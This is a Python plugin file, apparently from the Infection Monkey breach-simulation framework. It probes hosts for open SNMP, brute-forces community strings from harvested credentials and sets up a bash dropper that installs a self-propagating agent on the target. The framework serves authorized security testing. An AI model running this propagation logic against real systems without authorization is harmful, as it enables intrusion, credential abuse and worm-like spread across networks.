import logging
from functools import partial
from pprint import pformat
from typing import Any, Dict, Sequence, Tuple

# common imports
from common.event_queue import IAgentEventPublisher
from common.types import AgentID, Event
from common.utils.code_utils import del_key

# dependencies to get rid of or internalize
from infection_monkey.exploit import (
    IAgentBinaryRepository,
    IAgentOTPProvider,
    IHTTPAgentBinaryServerRegistrar,
)
from infection_monkey.exploit.tools import all_udp_ports_are_closed
from infection_monkey.exploit.tools.helpers import get_agent_dst_path
from infection_monkey.i_puppet import ExploiterResult, TargetHost
from infection_monkey.model import MONKEY_ARG
from infection_monkey.network import TCPPortSelector
from infection_monkey.propagation_credentials_repository import IPropagationCredentialsRepository
from infection_monkey.utils.commands import build_monkey_commandline_parameters
from infection_monkey.utils.script_dropper import build_bash_dropper

from .community_string_generator import generate_community_strings
from .snmp_client import SNMPClient
from .snmp_exploit_client import SNMPExploitClient
from .snmp_exploiter import SNMPExploiter
from .snmp_options import SNMPOptions

logger = logging.getLogger(__name__)


SNMP_PORTS = [161]


def should_attempt_exploit(host: TargetHost, snmp_client: SNMPClient) -> Tuple[bool, str]:
    if all_udp_ports_are_closed(host, SNMP_PORTS):
        return False, "Host has no open SNMP ports"
    try:
        snmp_client.get_system_name(host.ip, "public")
    except Exception:
        return False, "Host does not have SNMP enabled"
    return True, ""


class Plugin:
    def __init__(
        self,
        *,
        plugin_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        agent_binary_repository: IAgentBinaryRepository,
        http_agent_binary_server_registrar: IHTTPAgentBinaryServerRegistrar,
        propagation_credentials_repository: IPropagationCredentialsRepository,
        tcp_port_selector: TCPPortSelector,
        otp_provider: IAgentOTPProvider,
        **kwargs,
    ):
        self._plugin_name = plugin_name
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._agent_binary_repository = agent_binary_repository
        self._http_agent_binary_server_registrar = http_agent_binary_server_registrar
        self._propagation_credentials_repository = propagation_credentials_repository
        self._tcp_port_selector = tcp_port_selector
        self._otp_provider = otp_provider

    def run(
        self,
        *,
        host: TargetHost,
        servers: Sequence[str],
        current_depth: int,
        options: Dict[str, Any],
        interrupt: Event,
        **kwargs,
    ) -> ExploiterResult:
        # HTTP ports options are hack because they are needed in fingerprinters
        del_key(options, "http_ports")

        try:
            logger.debug(f"Parsing options: {pformat(options)}")
            snmp_options = SNMPOptions(**options)
        except Exception as err:
            msg = f"Failed to parse SNMP options: {err}"
            logger.exception(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        snmp_client = SNMPClient(snmp_options.snmp_request_timeout, snmp_options.snmp_retries)

        attempt_exploit, msg = should_attempt_exploit(host, snmp_client)
        if not attempt_exploit:
            logger.debug(f"Skipping brute force of host {host.ip}: {msg}")
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        try:
            logger.debug(f"Running SNMP exploiter on host {host.ip}")
            community_strings = generate_community_strings(
                self._propagation_credentials_repository.get_credentials()
            )

            snmp_exploiter = self._create_snmp_exploiter(snmp_client, host, servers, current_depth)
            return snmp_exploiter.exploit_host(host, snmp_options, community_strings, interrupt)
        except Exception as err:
            msg = f"An unexpected exception occurred while attempting to exploit host: {err}"
            logger.exception(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

    def _create_snmp_exploiter(
        self,
        snmp_client: SNMPClient,
        target_host: TargetHost,
        servers: Sequence[str],
        current_depth: int,
    ) -> SNMPExploiter:
        exploit_client = SNMPExploitClient(
            self._agent_id, self._agent_event_publisher, self._plugin_name, snmp_client
        )
        destination_path = get_agent_dst_path(target_host)
        args = [MONKEY_ARG]
        args.extend(
            build_monkey_commandline_parameters(
                parent=self._agent_id, servers=servers, depth=current_depth + 1
            )
        )
        dropper_transform = partial(build_bash_dropper, destination_path, args)
        return SNMPExploiter(
            exploit_client,
            self._http_agent_binary_server_registrar,
            dropper_transform,
            self._otp_provider,
        )
